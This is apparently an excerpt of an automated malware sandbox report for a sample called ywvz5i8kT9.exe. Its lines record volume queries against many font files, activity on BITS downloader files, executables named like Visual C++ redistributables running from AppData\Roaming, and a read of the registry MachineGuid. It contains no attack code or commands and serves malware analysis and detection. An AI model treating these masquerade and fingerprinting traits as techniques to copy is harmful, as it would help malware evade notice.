Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\logo.png VolumeInformation
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Queries volume information: C:\Windows\SysWOW64\RuntimeBroker.exe VolumeInformation

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

31_2_01004F6B

